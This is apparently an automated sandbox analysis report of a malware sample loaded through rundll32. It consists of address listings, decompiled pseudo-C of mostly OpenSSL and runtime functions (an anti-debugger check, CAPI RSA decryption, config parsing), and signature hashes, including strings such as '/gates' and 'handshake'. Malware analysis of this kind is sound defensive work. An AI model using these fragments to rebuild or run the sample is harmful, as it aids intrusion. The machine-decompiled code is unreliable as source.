                                        0x21ef2ff62c0
                                        0x21ef2ff62c4
                                        0x21ef2ff62c6
                                        0x21ef2ff62cb
                                        0x21ef2ff62e4
                                        0x21ef2ff62f8
                                        0x21ef2ff6306
                                        0x21ef2ff6316
                                        0x21ef2ff6321
                                        0x21ef2ff6327
                                        0x21ef2ff6332
                                        0x21ef2ff633c
                                        0x21ef2ff633f
                                        0x21ef2ff6347
                                        0x21ef2ff6355
                                        0x21ef2ff635a
                                        0x21ef2ff635c
                                        0x21ef2ff6361
                                        0x21ef2ff6365
                                        0x21ef2ff636d
                                        0x21ef2ff6370
                                        0x21ef2ff637b
                                        0x21ef2ff637d
                                        0x21ef2ff6382
                                        0x21ef2ff6389
                                        0x21ef2ff638b
                                        0x21ef2ff6394
                                        0x21ef2ff6396
                                        0x21ef2ff639e
                                        0x21ef2ff63a6
                                        0x21ef2ff63b4
                                        0x21ef2ff63c4
                                        0x21ef2ff63d2
                                        0x21ef2ff63e0
                                        0x21ef2ff63ee
                                        0x21ef2ff63fc
                                        0x21ef2ff640c
                                        0x21ef2ff641a
                                        0x21ef2ff6420
                                        0x21ef2ff642b
                                        0x21ef2ff642d
                                        0x21ef2ff6434
                                        0x21ef2ff643c
                                        0x21ef2ff6449
                                        0x21ef2ff644d
                                        0x21ef2ff6455
                                        0x21ef2ff645f
                                        0x21ef2ff646b
                                        0x21ef2ff6471
                                        0x21ef2ff647c
                                        0x21ef2ff647e
                                        0x21ef2ff648d
                                        0x21ef2ff64b8

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalSection$EnterExceptionLeaveThrow$CleanupStartup
                                        • String ID: /gates$handshake
                                        • API String ID: 1678628239-1467732948
                                        • Opcode ID: 0fe2b578b2385013cf4177be4bbabe4990dcb6d63d38493867b3cc39af894b51
                                        • Instruction ID: 18b0bee56757a3b81982a730980bb2e1f4c8efc93058e980308fc9aa9530d326
                                        • Opcode Fuzzy Hash: 0fe2b578b2385013cf4177be4bbabe4990dcb6d63d38493867b3cc39af894b51
                                        • Instruction Fuzzy Hash: 0F122933219BC591EA71DB14E8883DEB3A4F7A4740F414616DE8D53EA9EF38C586CB84
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF31119BC Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 43%
                                        			E0000021E21EF31119BC(void* __ecx, intOrPtr __edx, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				int _t38;
				long _t40;
				void* _t41;
				intOrPtr _t49;
				void* _t52;
				signed long long _t59;
				long long _t62;
				_Unknown_base(*)()* _t82;
				void* _t86;
				void* _t87;
				void* _t89;
				signed long long _t90;
				struct _EXCEPTION_POINTERS* _t96;

				_t42 = __ecx;
				 *((long long*)(_t89 + 0x10)) = __rbx;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t87 = _t89 - 0x4f0;
				_t90 = _t89 - 0x5f0;
				_t59 =  *0xf3203000; // 0x1fc8e4a4378e
				 *(_t87 + 0x4e0) = _t59 ^ _t90;
				_t49 = r8d;
				_t41 = __ecx;
				if (__ecx == 0xffffffff) goto 0xf31119fb;
				0xf310c834();
				r8d = 0x98;
				E0000021E21EF310E410(__ecx, 0, _t49, _t52, _t90 + 0x70, __rdx, _t82, __r8);
				r8d = 0x4d0;
				E0000021E21EF310E410(_t42, 0, _t49, _t52, _t87 + 0x10, __rdx, _t82, __r8);
				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
				_t62 = _t87 + 0x10;
				 *((long long*)(_t90 + 0x50)) = _t62;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t62 == 0) goto 0xf3111a8e;
				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
				 *((long long*)(_t90 + 0x30)) = _t90 + 0x60;
				 *((long long*)(_t90 + 0x28)) = _t90 + 0x58;
				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x74)) = _t49;
				_t38 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t82, _t86);
				_t40 = UnhandledExceptionFilter(_t96);
				if (_t40 != 0) goto 0xf3111af0;
				if (_t38 != 0) goto 0xf3111af0;
				if (_t41 == 0xffffffff) goto 0xf3111af0;
				0xf310c834();
				E0000021E21EF310C290();
				return _t40;
			}

















                                        0x21ef31119bc
                                        0x21ef31119bc
                                        0x21ef31119c1
                                        0x21ef31119ca
                                        0x21ef31119d2
                                        0x21ef31119d9
                                        0x21ef31119e3
                                        0x21ef31119ea
                                        0x21ef31119ef
                                        0x21ef31119f4
                                        0x21ef31119f6
                                        0x21ef3111a02
                                        0x21ef3111a08
                                        0x21ef3111a13
                                        0x21ef3111a19
                                        0x21ef3111a23
                                        0x21ef3111a2c
                                        0x21ef3111a30
                                        0x21ef3111a35
                                        0x21ef3111a4a
                                        0x21ef3111a4d
                                        0x21ef3111a56
                                        0x21ef3111a58
                                        0x21ef3111a6b
                                        0x21ef3111a78
                                        0x21ef3111a81
                                        0x21ef3111a88
                                        0x21ef3111a95
                                        0x21ef3111aa7
                                        0x21ef3111aab
                                        0x21ef3111ab9
                                        0x21ef3111abd
                                        0x21ef3111ac1
                                        0x21ef3111acb
                                        0x21ef3111ad6
                                        0x21ef3111ade
                                        0x21ef3111ae2
                                        0x21ef3111ae7
                                        0x21ef3111aeb
                                        0x21ef3111afa
                                        0x21ef3111b16

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                        • String ID:
                                        • API String ID: 1239891234-0
                                        • Opcode ID: bb594284fa3fc0d750bf4eb0282b7eb08e519545bf601487c94571a1f072b000
                                        • Instruction ID: f7b4b9456d200b53331afbd72107542f012ecec24d2d7f45254383d984e72249
                                        • Opcode Fuzzy Hash: bb594284fa3fc0d750bf4eb0282b7eb08e519545bf601487c94571a1f072b000
                                        • Instruction Fuzzy Hash: F9316732200B8086EF608B25E8843DE77B4F799798F514126EE8D47B99EF38C556CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3035030 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 305timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$FileSystem
                                        • String ID: ....................$..\..\openssl-1.1.0f\crypto\rand\md_rand.c$You need to read the OpenSSL FAQ, https://www.openssl.org/docs/faq.html$gfff
                                        • API String ID: 2086374402-4054206009
                                        • Opcode ID: c7dcaec6b15934f6ae919af045ae75d685298c7076d44e80fe67b8d19168120d
                                        • Instruction ID: f055cb83be43010cb76718092e9316860954f7a445e4888421438ee308a19dac
                                        • Opcode Fuzzy Hash: c7dcaec6b15934f6ae919af045ae75d685298c7076d44e80fe67b8d19168120d
                                        • Instruction Fuzzy Hash: BED1C17530064086FF549B25ED593EBA3A1BBA4B84F4681269D4A87FB6DF3CC54BCB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF302F8B0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169encryptionCOMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 38%
                                        			E0000021E21EF302F8B0(void* __ebx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __rbp, void* __r8, void* __r9, long long _a8, long long _a24, long long _a32, void* _a56, void* _a72) {
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t25;
				void* _t30;
				void* _t31;
				void* _t41;
				void* _t42;
				void* _t78;

				_t126 = __r9;
				_t125 = __r8;
				_t121 = __rbp;
				_t119 = __rsi;
				_t104 = __rdx;
				_t79 = __rbx;
				_t78 = __rax;
				_t48 = __ebx;
				_a8 = __rbx;
				_a24 = __rsi;
				E0000021E21EF310C220();
				if ( *0xf31e78c4 >= 0) goto 0xf302fad9;
				_a32 = __rsi;
				r9d = 0;
				r8d = 0;
				_a24 = __rsi;
				_t22 = E0000021E21EF3028570(__ebx, 0, __rax, __rbx, __rdx, __rsi, __rbp, __r8, __r9);
				 *0xf31e78c4 = _t22;
				if (_t22 < 0) goto 0xf302fae3;
				_a32 = __rsi;
				r9d = 0;
				_a24 = __rsi;
				r8d = 0;
				_t23 = E0000021E21EF3028570(__ebx, 0, __rax, _t79, _t104, __rsi, _t121, __r8, __r9);
				r9d = 0;
				_a32 = __rsi;
				r8d = 0;
				 *0xf31e78e0 = _t23;
				_a24 = __rsi;
				 *0xf31e78d8 = E0000021E21EF3028570(__ebx, 0, __rax, _t79, _t104, __rsi, _t121, __r8, __r9);
				_t25 = E0000021E21EF3045D00(_t24);
				_t80 = _t78;
				E0000021E21EF3045EA0(_t25, _t78);
				if (E0000021E21EF3045F70( *0xf3209028, _t78) == 0) goto 0xf302fae3;
				E0000021E21EF3024390(_t27, _t78);
				if (E0000021E21EF3041050( *0xf3209028, _t78) == 0) goto 0xf302fae3;
				_t30 = E0000021E21EF3041080( *0xf3209028, E0000021E21EF3030A10);
				if (_t30 == 0) goto 0xf302fae3;
				0xf3046dd0();
				if (_t30 == 0) goto 0xf302fae3;
				_t31 = E0000021E21EF3075EE0(_t30, _t78);
				0xf303ee30();
				if (_t31 == 0) goto 0xf302fae3;
				E0000021E21EF3035740(_t31, _t80);
				if (E0000021E21EF30357C0( *0xf3209028, _t78) == 0) goto 0xf302fae3;
				if (E0000021E21EF303F280( *0xf3209028, 0xf3030700) == 0) goto 0xf302fae3;
				if (E0000021E21EF3045F80( *0xf3209028, 0xf3030a60) == 0) goto 0xf302fae3;
				_a32 = __rsi;
				r9d = 0;
				_a24 = __rsi;
				r8d = 0;
				 *0xf31e78dc = E0000021E21EF3028570(_t48, 0, _t78, _t80, 0xf3030a60, __rsi, _t121, _t125, _t126);
				E0000021E21EF3046A20(_t36);
				_t81 = _t78;
				if (E0000021E21EF3045F70( *0xf3209030, 0x21ef302e300) == 0) goto 0xf302fae3;
				E0000021E21EF308D460(_t38, _t78);
				if (E0000021E21EF3041080( *0xf3209030, _t78) == 0) goto 0xf302fae3;
				_t41 = E0000021E21EF303F080( *0xf3209030, 0x21ef302e660);
				if (_t41 == 0) goto 0xf302fae3;
				0xf3046d00();
				0xf3046dd0();
				if (_t41 == 0) goto 0xf302fae3;
				_t42 = E0000021E21EF3075EE0(_t41, _t78);
				_t117 = _t78;
				0xf303ee30();
				if (_t42 == 0) goto 0xf302fae3;
				E0000021E21EF302E010(_t42, _t78, _t81, __rsi, _t121);
				if (_t78 != 0) goto 0xf302fb29;
				if ( *0xf3209020 != 0) goto 0xf302faf8;
				 *0xf3209020 = E0000021E21EF3021CE0(_t78);
				_a24 = 0x1e9;
				_t18 = _t117 - 0x29; // 0x41
				r8d = _t18;
				E0000021E21EF30222D0(_t45, 0x6a,  *0xf3209020, _t78, _t81,  *0xf3209030, _t78, _t119, _t121, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				return 0;
			}











                                        0x21ef302f8b0
                                        0x21ef302f8b0
                                        0x21ef302f8b0
                                        0x21ef302f8b0
                                        0x21ef302f8b0
                                        0x21ef302f8b0
                                        0x21ef302f8b0
                                        0x21ef302f8b0
                                        0x21ef302f8b0
                                        0x21ef302f8b5
                                        0x21ef302f8c0
                                        0x21ef302f8d2
                                        0x21ef302f8dd
                                        0x21ef302f8e2
                                        0x21ef302f8e5
                                        0x21ef302f8e8
                                        0x21ef302f8ef
                                        0x21ef302f8f4
                                        0x21ef302f8fc
                                        0x21ef302f902
                                        0x21ef302f90a
                                        0x21ef302f90d
                                        0x21ef302f912
                                        0x21ef302f917
                                        0x21ef302f91c
                                        0x21ef302f91f
                                        0x21ef302f924
                                        0x21ef302f927
                                        0x21ef302f92f
                                        0x21ef302f93c
                                        0x21ef302f942
                                        0x21ef302f94a
                                        0x21ef302f94d
                                        0x21ef302f963
                                        0x21ef302f96c
                                        0x21ef302f982
                                        0x21ef302f996
                                        0x21ef302f99d
                                        0x21ef302f9b1
                                        0x21ef302f9b8
                                        0x21ef302f9c1
                                        0x21ef302f9d0
                                        0x21ef302f9d7
                                        0x21ef302f9e0
                                        0x21ef302f9f6
                                        0x21ef302fa11
                                        0x21ef302fa2c
                                        0x21ef302fa32
                                        0x21ef302fa3a
                                        0x21ef302fa3d
                                        0x21ef302fa42
                                        0x21ef302fa4c
                                        0x21ef302fa52
                                        0x21ef302fa65
                                        0x21ef302fa6f
                                        0x21ef302fa74
                                        0x21ef302fa8a
                                        0x21ef302fa9a
                                        0x21ef302faa1
                                        0x21ef302faa6
                                        0x21ef302fab5
                                        0x21ef302fabc
                                        0x21ef302fac1
                                        0x21ef302facd
                                        0x21ef302fad0
                                        0x21ef302fad7
                                        0x21ef302fad9
                                        0x21ef302fae1
                                        0x21ef302faeb
                                        0x21ef302faf2
                                        0x21ef302fafd
                                        0x21ef302fb0e
                                        0x21ef302fb0e
                                        0x21ef302fb12
                                        0x21ef302fb28

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCrypt$AcquireRelease
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Microsoft Enhanced RSA and AES Cryptographic Provider
                                        • API String ID: 2306398074-1702151034
                                        • Opcode ID: bf7a6ba508d6a465c244e243e2658b6b54b5c6703a2021ce59ff3648c6eb9b7c
                                        • Instruction ID: a6315a4b55b228a36687c6ca6a81948c1b4a4854fbddd3b9fa49a4cbae2bfb05
                                        • Opcode Fuzzy Hash: bf7a6ba508d6a465c244e243e2658b6b54b5c6703a2021ce59ff3648c6eb9b7c
                                        • Instruction Fuzzy Hash: 83714C74A0474181FF20EB62FD5D7DB67A5A7A4BC4F068026AD4A87EA6EE3CC507C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3030790 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 153COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 45%
                                        			E0000021E21EF3030790(void* __ebx, void* __ecx, char __esi, void* __rax, void* __rdx, long long __rdi, void* __r8, void* __r9, long long __r14, long long _a8, char _a16, char _a24, signed long long _a40, long long _a48, long long _a104, intOrPtr _a128) {
				signed long long _v0;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed int _t48;
				void* _t72;
				char _t73;
				void* _t74;
				signed long long _t88;
				signed long long _t89;
				void* _t91;
				void* _t98;
				char* _t107;
				signed int* _t111;
				signed long long _t117;
				void* _t119;
				void* _t120;
				void* _t121;
				char* _t131;
				void* _t136;

				_t73 = __esi;
				E0000021E21EF310C220();
				_t88 =  *0xf3203000; // 0x1fc8e4a4378e
				_t89 = _t88 ^ _t121 - __rax;
				_a40 = _t89;
				_t119 = __ecx;
				_t91 = __r9;
				_t136 = __r8;
				_t120 = __rdx;
				if (__ecx > 0) goto 0xf30307c9;
				goto 0xf30309f6;
				_a48 = __r14;
				E0000021E21EF3024390(__esi, __r9);
				E0000021E21EF30311E0(_t89, _t89);
				_t107 = "Called capi_rsa_priv_dec()\n";
				E0000021E21EF302D790(_t89, _t107, __r8, __r9);
				E0000021E21EF303F920(__ecx, _t89, _t91, _t91, __ecx, __rdx);
				if (_t89 != 0) goto 0xf3030845;
				if ( *0xf3209020 != 0) goto 0xf303081e;
				 *0xf3209020 = E0000021E21EF3021CE0(_t89);
				_v0 = 0x3a3;
				_t4 = _t107 - 9; // 0x65
				r8d = _t4;
				E0000021E21EF30222D0(_t35, 0x6e,  *0xf3209020, _t89, _t91, _t91, _t107, _t119, _t120, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0xf30309f1;
				r9d = _a128;
				if (r9d == 1) goto 0xf30308bb;
				E0000021E21EF3026420(_t89,  &_a24, _t107, 0xf3145258, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				if ( *0xf3209020 != 0) goto 0xf303087e;
				 *0xf3209020 = E0000021E21EF3021CE0(_t89);
				_v0 = 0x3aa;
				_t8 = _t107 + 0xa; // 0x78
				r8d = _t8;
				E0000021E21EF30222D0(_t40, 0x6e,  *0xf3209020, _t89, _t91,  &_a24, _t107, _t119, _t120, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF3021640(2, _t89, "padding=",  &_a24, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0xf30309f1;
				r8d = 0x3b0;
				_a104 = __rdi;
				_t109 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
				_t98 = _t119;
				E0000021E21EF3025700();
				_t117 = _t89;
				if (_t89 != 0) goto 0xf303091c;
				if ( *0xf3209020 != 0) goto 0xf30308f5;
				 *0xf3209020 = E0000021E21EF3021CE0(_t89);
				_v0 = 0x3b1;
				_t131 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
				_t12 = _t109 - 0x2d; // 0x41
				r8d = _t12;
				E0000021E21EF30222D0(_t45, 0x6e,  *0xf3209020, _t89, _t91, _t98, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", _t119, _t120, _t131);
				goto 0xf30309e9;
				if (_t73 <= 0) goto 0xf3030942;
				_t111 = _t119 - 1 + _t117;
				_t48 =  *(_t98 + _t120) & 0x000000ff;
				 *_t111 = _t48;
				_t112 = _t111 - 1;
				if (_t98 + 1 - _t119 < 0) goto 0xf3030930;
				r9d = 0;
				_a16 = _t73;
				_a8 =  &_a16;
				_v0 = _t117;
				_t21 = _t131 + 1; // 0x1
				r8d = _t21;
				__imp__CryptDecrypt();
				if (_t48 != 0) goto 0xf30309bf;
				if ( *0xf3209020 != 0) goto 0xf3030981;
				 *0xf3209020 = E0000021E21EF3021CE0( &_a16);
				_v0 = 0x3ba;
				_t23 = _t112 - 5; // 0x69
				r8d = _t23;
				E0000021E21EF30222D0(_t50, 0x6e,  *0xf3209020,  &_a16, _t91,  *((intOrPtr*)(_t89 + 0x10)), _t111 - 1, _t119, _t120, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF302DA10( *0xf3209020,  &_a16, _t111 - 1);
				r8d = 0x3bc;
				E0000021E21EF3025750();
				goto 0xf30309e9;
				E0000021E21EF310DC90(_t50, _t72, _t73, _t74, _t136, _t117, _t117, _t119, _a16);
				r8d = 0x3c1;
				E0000021E21EF3025750();
				E0000021E21EF310C290();
				return __ebx;
			}























                                        0x21ef3030790
                                        0x21ef303079b
                                        0x21ef30307a3
                                        0x21ef30307aa
                                        0x21ef30307ad
                                        0x21ef30307b2
                                        0x21ef30307b5
                                        0x21ef30307b8
                                        0x21ef30307bb
                                        0x21ef30307c0
                                        0x21ef30307c4
                                        0x21ef30307cc
                                        0x21ef30307d1
                                        0x21ef30307df
                                        0x21ef30307e4
                                        0x21ef30307ee
                                        0x21ef30307fc
                                        0x21ef3030807
                                        0x21ef3030811
                                        0x21ef3030818
                                        0x21ef3030823
                                        0x21ef3030834
                                        0x21ef3030834
                                        0x21ef3030838
                                        0x21ef3030840
                                        0x21ef3030845
                                        0x21ef3030851
                                        0x21ef3030864
                                        0x21ef3030871
                                        0x21ef3030878
                                        0x21ef3030883
                                        0x21ef3030894
                                        0x21ef3030894
                                        0x21ef3030898
                                        0x21ef30308ae
                                        0x21ef30308b6
                                        0x21ef30308bb
                                        0x21ef30308c1
                                        0x21ef30308c9
                                        0x21ef30308d0
                                        0x21ef30308d3
                                        0x21ef30308d8
                                        0x21ef30308de
                                        0x21ef30308e8
                                        0x21ef30308ef
                                        0x21ef30308fa
                                        0x21ef3030902
                                        0x21ef303090b
                                        0x21ef303090b
                                        0x21ef303090f
                                        0x21ef3030917
                                        0x21ef3030920
                                        0x21ef3030926
                                        0x21ef3030930
                                        0x21ef3030937
                                        0x21ef3030939
                                        0x21ef3030940
                                        0x21ef3030942
                                        0x21ef3030945
                                        0x21ef3030952
                                        0x21ef3030959
                                        0x21ef303095e
                                        0x21ef303095e
                                        0x21ef3030962
                                        0x21ef303096a
                                        0x21ef3030974
                                        0x21ef303097b
                                        0x21ef3030986
                                        0x21ef3030997
                                        0x21ef3030997
                                        0x21ef303099b
                                        0x21ef30309a0
                                        0x21ef30309a5
                                        0x21ef30309b5
                                        0x21ef30309bd
                                        0x21ef30309cd
                                        0x21ef30309d2
                                        0x21ef30309e2
                                        0x21ef30309fe
                                        0x21ef3030a0c

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Called capi_rsa_priv_dec()$padding=
                                        • API String ID: 0-3671336825
                                        • Opcode ID: f2e44db5cb2352129625bcebb1a276bec3d738dedd622a7a7a070fede8a05b0c
                                        • Instruction ID: 96b308cb0a9d7616fcc0704bda1b4b4d23ba4ea307e13ef0f7213ccf9520f099
                                        • Opcode Fuzzy Hash: f2e44db5cb2352129625bcebb1a276bec3d738dedd622a7a7a070fede8a05b0c
                                        • Instruction Fuzzy Hash: 1A61BC7530164086FE20DB65EC097EBB3A1F7A9B84F424127AD8A87FA6DB7CC506C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FF3170 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$Init_thread_footerRecv
                                        • String ID: M'
                                        • API String ID: 195032187-2701432540
                                        • Opcode ID: e6dcab2cf663dec8bff369709bdda2d69aada8583e079ad5373920b1b0be3df2
                                        • Instruction ID: 645336f8229046cc61b629938495caa51603273043c343696affe74f4680b568
                                        • Opcode Fuzzy Hash: e6dcab2cf663dec8bff369709bdda2d69aada8583e079ad5373920b1b0be3df2
                                        • Instruction Fuzzy Hash: 4B315E729086C087EB208F24F84429AB7B0F799794F258219EF8D56E59DF3CC4D58B04
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30336A0 Relevance: 5.5, Strings: 4, Instructions: 518COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 19%
                                        			E0000021E21EF30336A0(void* __rax, long long __rbx, void* __rcx, long long __rdx, long long __r8, signed long long _a8, signed long long _a16, signed long long _a24, long long _a32, void* _a40, char _a48, signed long long _a64, void* _a160) {
				long long _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v24;
				void* __rsi;
				void* __rbp;
				signed int _t168;
				void* _t186;
				intOrPtr _t194;
				signed int _t204;
				signed int _t212;
				void* _t234;
				char _t242;
				void* _t297;
				signed long long _t307;
				signed long long _t308;
				char* _t310;
				signed long long _t312;
				void* _t313;
				signed long long _t314;
				signed char* _t317;
				signed char* _t318;
				signed char* _t319;
				signed char* _t320;
				signed long long _t321;
				signed char* _t322;
				signed char* _t323;
				intOrPtr* _t324;
				intOrPtr* _t327;
				signed char* _t329;
				char* _t332;
				signed long long _t341;
				void* _t342;
				void* _t343;
				signed char* _t351;
				signed char* _t352;
				void* _t354;
				void* _t355;
				signed char* _t374;
				signed char* _t378;
				intOrPtr _t383;
				intOrPtr _t384;
				signed long long _t399;
				signed char* _t400;
				signed char* _t401;
				signed char* _t402;
				intOrPtr* _t403;
				void* _t405;
				signed long long _t407;
				void* _t409;
				signed char* _t413;
				void* _t415;
				intOrPtr _t419;
				intOrPtr _t420;
				char* _t426;
				signed char* _t428;
				signed char* _t439;
				long long _t440;
				void* _t441;
				signed long long _t445;

				_t369 = __rdx;
				_t325 = __rbx;
				_a32 = __rbx;
				E0000021E21EF310C220();
				_t307 =  *0xf3203000; // 0x1fc8e4a4378e
				_t308 = _t307 ^ _t415 - __rax;
				_a64 = _t308;
				_v8 = 0;
				_t441 = __rcx;
				_v0 =  *((intOrPtr*)(__rcx + 0x10));
				r15d = 0;
				_a40 = __r8;
				_a32 = __rdx;
				E0000021E21EF304DD50(_t234, _t308, _t405, _t409);
				_a8 = _t308;
				if (_t308 != 0) goto 0xf3033722;
				_v24 = 0xb3;
				_t10 = _t325 + 0x79; // 0x79
				_t11 = _t325 + 0xe; // 0xe
				_t12 = _t325 + 7; // 0x7
				r8d = _t12;
				E0000021E21EF30222D0(_t11, _t10, _t308, _t308, __rbx, __rcx, _t369, _t405, _t308, "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c");
				goto 0xf3033c62;
				r8d = 0xb7;
				_t332 = "default";
				E0000021E21EF3025150(_t308, _t332);
				_a16 = _t308;
				_a24 = _t308;
				if (_t308 != 0) goto 0xf3033774;
				_v24 = 0xb9;
				r8d = 0x41;
				_t426 = "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c";
				_t16 = _t332 + 0x6b; // 0x79
				E0000021E21EF30222D0(0xe, _t16, _t308, _t308, _t325, _t332, "..\\..\\openssl-1.1.0f\\crypto\\conf\\conf_def.c", _t308, _t308, _t426);
				goto 0xf3033c62;
				if (E0000021E21EF30347F0(_t308, _t441) != 0) goto 0xf303378a;
				_v24 = 0xbe;
				goto 0xf3033755;
				0xf3034840();
				if (_t308 != 0) goto 0xf30337ab;
				_v24 = 0xc4;
				_t19 = _t308 + 0x67; // 0x67
				r8d = _t19;
				goto 0xf303375b;
				r12d = 0;
				E0000021E21EF304DA90(_t308, _t325, _t308, _t308);
				if (_t308 == 0) goto 0xf3033d82;
				asm("o16 nop [eax+eax]");
				r8d = 0x1ff;
				_t327 = r12d + _a8;
				 *_t327 = 0;
				0xf3022db0();
				 *((char*)(_t327 + 0x1ff)) = 0;
				if ( *_t327 == 0) goto 0xf3033812;
				if (0 - 0x80000000 >= 0) goto 0xf3033812;
				_t310 = _t327 + 1;
				_t242 =  *_t310;
				if (_t242 != 0) goto 0xf3033800;
				r8d = 1;
				if (_t242 != 0) goto 0xf3033825;
				if (0 == 0) goto 0xf3033daa;
				_v4 = 0;
				if (1 == 0) goto 0xf303386f;
				r9d = 1;
				_t374 = _t327 - 1 + _t310;
				_t168 =  *_t374 & 0x000000ff;
				if (_t168 == 0xd) goto 0xf303384c;
				if (_t168 != 0xa) goto 0xf303385b;
				r8d = r8d - 1;
				if (_t426 - _t327 + _t374 - 1 > 0) goto 0xf3033841;
				if (1 == 0) goto 0xf303386f;
				if (r8d != 1) goto 0xf303386f;
				_v4 = 1;
				goto 0xf303387a;
				_v8 = _v8 + 1;
				_t312 = r8d;
				 *((intOrPtr*)(_t312 + _t327)) = dil;
				r12d = r12d + r8d;
				r15d = 0;
				if (r12d - 1 < 0) goto 0xf30338be;
				_t419 =  *((intOrPtr*)(_t441 + 8));
				_t31 = _t440 - 1; // -1
				if (( *(_t419 + _t312 * 2) & 0x00000020) == 0) goto 0xf30338be;
				if (r12d - 1 <= 0) goto 0xf30338b1;
				if (( *(_t419 + _t312 * 2) & 0x00000020) != 0) goto 0xf30338be;
				r12d = _t31;
				goto 0xf3033d62;
				if (1 != 0) goto 0xf3033d62;
				_t399 = _a8;
				r12d = 0;
				E0000021E21EF3033ED0(_t312, _t441, _t399);
				_t420 =  *((intOrPtr*)(_t441 + 8));
				_t313 = _t312 + _t312;
				if (( *(_t420 + _t313) & 0x00000010) == 0) goto 0xf3033908;
				if (( *(_t313 + _t420) & 0x00000008) != 0) goto 0xf3033908;
				_t400 = _t399 + 1;
				_t314 = _t313 + _t313;
				if (( *(_t314 + _t420) & 0x00000010) != 0) goto 0xf30338f0;
				if (( *(_t420 + _t314 * 2) & 0x00000008) != 0) goto 0xf3033d5e;
				if (( *_t400 & 0x000000ff) != 0x5b) goto 0xf3033a57;
				_t401 =  &(_t400[1]);
				if (( *(_t420 + _t314 * 2) & 0x00000010) == 0) goto 0xf3033947;
